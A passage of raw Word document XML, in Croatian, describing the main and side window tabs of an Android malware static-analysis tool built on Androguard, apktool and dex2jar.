      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc406756489"/>
      <w:bookmarkStart w:id="36" w:name="_Toc406756602"/>
      <w:r w:rsidRPr="003B3B23">
        <w:t>Glavni prozor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Glavni prozor je središnji prozor namijenjen statičnoj analizi zloćudnog programa. Sadrži sljedeće kartice:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>CFG (Control Flow Diagram)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Dalvik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ByteCode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Smali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Call in/out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Permission</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>AndroidManifest.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRDefault="00B35A13" w:rsidP="00257A5C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5094605" cy="814070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="9" name="Slika 9" descr="Glavni prozor - smanj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avni prozor - smanje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4605" cy="814070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C095D" w:rsidRPr="007C095D" w:rsidRDefault="00327E2E" w:rsidP="009238DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 3.3</w:t>
      </w:r>
      <w:r w:rsidR="007C095D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Glavni prozor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRPr="003B3B23" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc406756490"/>
      <w:bookmarkStart w:id="38" w:name="_Toc406756603"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>CFG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica grafa kontrole toka grafički prikazuje kontrolu toka Android programa. Zumiranje i povlačenje grafa je jednostavno omogućeno korištenjem računalnog miša. Kod u CFG-u je formatirani Dalvik kod. Pritiskom tipke Space, kada se odabere čvor na grafu, skače se na pogled koda. Ovo svojstvo je omogućeno Androguardom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRPr="003B3B23" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc406756491"/>
      <w:bookmarkStart w:id="40" w:name="_Toc406756604"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Dalvik</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica Dalvik omogućuje pregled Dalvik koda. Dalvik je virtualni stroj koji može pokretati programe i kodove napisane u Javi. Standardni Java kompajler prevađa izvorni kod u Bytekod, a zatim se on kompajlira u .dex datoteku koju virtualni stroj Dalvik može čitati i koristiti. Dalvik kod dopušta pogled u to koji operacijski kod je nastao iz kojeg Java koda, tako da, kada nastane pogreška, trag stoga daje korisnu informaciju gdje je nastala ta pogreška.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Korisnik se može prebaciti u grafički prikaz desnim klikom miša te odabirom na “</w:t>
      </w:r>
      <w:r w:rsidRPr="00257A5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Goto CFG</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>”. Također omogućuje pisanje bilješki, a linija bilješke je namijenjena da odgovara liniji Dalvik koda.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Ova kartica daje korisniku slobodu da preimenuje Stringove u Dalvik kodu, a originalno ime je sadržano u tablici za buduće upućivanje. Ta preinaka će biti vidljiva i u CFG-u.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRPr="003B3B23" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc406756492"/>
      <w:bookmarkStart w:id="42" w:name="_Toc406756605"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ByteCode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ByteCode kartica prikazuje “sirove” Dalvik bytekodove, a omogućuje i pisanje komentara. Ovo svojstvo je omogućeno Androguardom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRPr="003B3B23" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc406756493"/>
      <w:bookmarkStart w:id="44" w:name="_Toc406756606"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Smali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Smali kartica prikazuje formatiran Smali kod te se također mogu pisati komentari. Može se odabrati Smali metoda da bi dobio Call in/out pogled. Ovo svojstvo je omogućeno alatima apktool i baksmali.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRPr="003B3B23" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc406756494"/>
      <w:bookmarkStart w:id="46" w:name="_Toc406756607"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica Java dopušta analitičarima pregled Java interpretacije izvora. Ovo svojstvo je u trenutku pisanja omogućeno alatima dex2jar i JAD, no tvorci projekta rade na tome da se koristi alat DED.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRPr="003B3B23" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc406756495"/>
      <w:bookmarkStart w:id="48" w:name="_Toc406756608"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Call in/out</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica Call in/out prikazuje odakle je određena metoda pozvana ili koje druge metode ona poziva.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRDefault="00257A5C" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc406756496"/>
      <w:bookmarkStart w:id="50" w:name="_Toc406756609"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Permission</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica dozvola prikazuje tražene dozvole te gdje su, u izvorišnoj datoteci, upućivane. Alat koji omogućuje ovo svojstvo je Androguard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRDefault="00257A5C" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc406756497"/>
      <w:bookmarkStart w:id="52" w:name="_Toc406756610"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>AndroidManifest.xml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica AndroidManifest.xml prikazuje potpunu AndroidManifest.xml datoteku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D529EE" w:rsidRPr="003B3B23" w:rsidRDefault="00D529EE" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc406756498"/>
      <w:bookmarkStart w:id="54" w:name="_Toc406756611"/>
      <w:r w:rsidRPr="003B3B23">
        <w:lastRenderedPageBreak/>
        <w:t>Sporedni prozor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00257A5C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Sporedni prozor sadrži 5 kartica, tekstualno polje te dva radio gumba. Kartice su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Strings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Classes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>APKInfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRPr="003B3B23" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, a radio gumbi su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRDefault="00B35A13" w:rsidP="00257A5C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4089400" cy="401955"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="10" name="Slika 10" descr="Sporedni prozor - kar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oredni prozor - karti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9400" cy="401955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C095D" w:rsidRPr="007C095D" w:rsidRDefault="00327E2E" w:rsidP="00257A5C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 3.4</w:t>
      </w:r>
      <w:r w:rsidR="007C095D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Kartice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257A5C" w:rsidRPr="003B3B23" w:rsidRDefault="00257A5C" w:rsidP="00257A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
